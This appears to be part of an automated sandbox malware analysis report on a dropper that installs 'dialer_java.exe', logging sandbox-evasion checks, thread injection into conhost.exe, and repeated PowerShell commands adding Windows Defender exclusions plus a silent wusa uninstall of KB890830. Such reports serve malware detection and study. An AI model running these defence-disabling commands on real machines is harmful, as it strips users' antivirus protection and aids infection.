Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6629	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3149	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7017	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2574	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5924	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3778	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7591
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1945
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7553
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1908
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7451
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2142
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8037
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1519
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6128
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3648
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8148
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1194
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1587
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6415
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3111
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7475
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2096
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6842
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2656
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7734
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1697

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	API coverage: 0.4 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	API coverage: 0.4 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	API coverage: 6.3 %
Source: C:\Windows\System32\conhost.exe	API coverage: 0.7 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	API coverage: 6.3 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	API coverage: 6.3 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	API coverage: 6.3 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	API coverage: 6.4 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	API coverage: 6.4 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 908	Thread sleep count: 6629 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5576	Thread sleep count: 3149 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560	Thread sleep count: 7017 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560	Thread sleep count: 2574 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912	Thread sleep count: 5924 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912	Thread sleep count: 3778 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544	Thread sleep count: 7591 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544	Thread sleep count: 1945 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312	Thread sleep count: 7553 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312	Thread sleep count: 1908 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7328	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648	Thread sleep count: 7451 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644	Thread sleep count: 2142 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472	Thread sleep count: 8037 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472	Thread sleep count: 1519 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920	Thread sleep count: 6128 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep count: 3648 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916	Thread sleep count: 8148 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308	Thread sleep count: 1194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3624	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836	Thread sleep count: 7891 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4248	Thread sleep count: 1587 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612	Thread sleep count: 6415 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612	Thread sleep count: 3111 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640	Thread sleep count: 7475 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308	Thread sleep count: 2096 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep count: 6842 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep count: 2656 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5376	Thread sleep count: 7734 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 976	Thread sleep count: 1697 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176	Thread sleep time: -6456360425798339s >= -30000s

Source: C:\Windows\System32\conhost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400389D0 MultiByteToWideChar,MultiByteToWideChar,calloc,MultiByteToWideChar,FindFirstFileW,free,FindClose,		25_2_00000001400389D0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140038E50 strncpy,MultiByteToWideChar,MultiByteToWideChar,calloc,MultiByteToWideChar,FindFirstFileW,free,malloc,FindClose,		25_2_0000000140038E50

Source: C:\Windows\System32\conhost.exe

Code function: 25_2_0000000140009160 GetSystemInfo,

25_2_0000000140009160

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: conhost.exe, 00000019.00000002.3065606793.00000164780B0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: B;Nk7sHQPmx\cru\\|Rmf[;n.zi]h5_e;k\N/_JfKqeMUkRWpncO)zNGp&~X~.zX
Source: conhost.exe, 00000019.00000002.3065200958.00000164766F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: conhost.exe, 00000019.00000003.1964179772.0000016476762000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000003.1963510932.0000016476762000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000003.1965743221.0000016476762000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000003.1964872202.0000016476762000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065200958.0000016476762000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000003.1962703704.0000016476762000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF6099B1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	0_2_00007FF6099B1160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 16_2_00007FF6E3A61160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	16_2_00007FF6E3A61160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 17_2_00007FF6E3A61160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	17_2_00007FF6E3A61160
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014000118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	25_2_000000014000118B
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400011D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	25_2_00000001400011D8
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 35_2_00007FF75B4A1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	35_2_00007FF75B4A1160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 49_2_00007FF6ECFF1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	49_2_00007FF6ECFF1160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 69_2_00007FF71BD51160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	69_2_00007FF71BD51160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 83_2_00007FF7C0EF1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	83_2_00007FF7C0EF1160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 97_2_00007FF642721160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	97_2_00007FF642721160

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

Thread register set: target process: 7720

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe	Jump to behavior
